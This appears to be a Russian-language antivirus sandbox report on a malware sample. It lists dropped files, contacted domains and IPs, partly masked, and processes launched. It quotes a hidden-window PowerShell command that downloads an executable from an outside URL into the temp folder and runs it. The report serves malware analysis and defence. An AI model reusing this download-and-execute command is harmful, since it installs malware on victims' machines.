Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $poyt как %temp%\kjhgf.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c powershell "'powershell ""function skdhs([string] $poyt){(new-object system.net.webclient).downloadfile($poyt,''%tmp%\kjhgf.exe'');start-process ''%tmp%\kjhgf.exe'';}try{skdhs(''http://noble...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1700
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\zioouyt.bat
- %TEMP%\646109.cvr
Сетевая активность
TCP
Другие
- '34.##9.100.209':443
UDP
- DNS ASK no###s-iq.com
- DNS ASK bb##es.com
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\zioouyt.bat" " (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell "'powershell ""function skdhs([string] $poyt){(new-object system.net.webclient).downloadfile($poyt,''%tmp%\kjhgf.exe'');start-process ''%tmp%\kjhgf.exe'';}try{skdhs(''http://noble... (со скрытым окном)
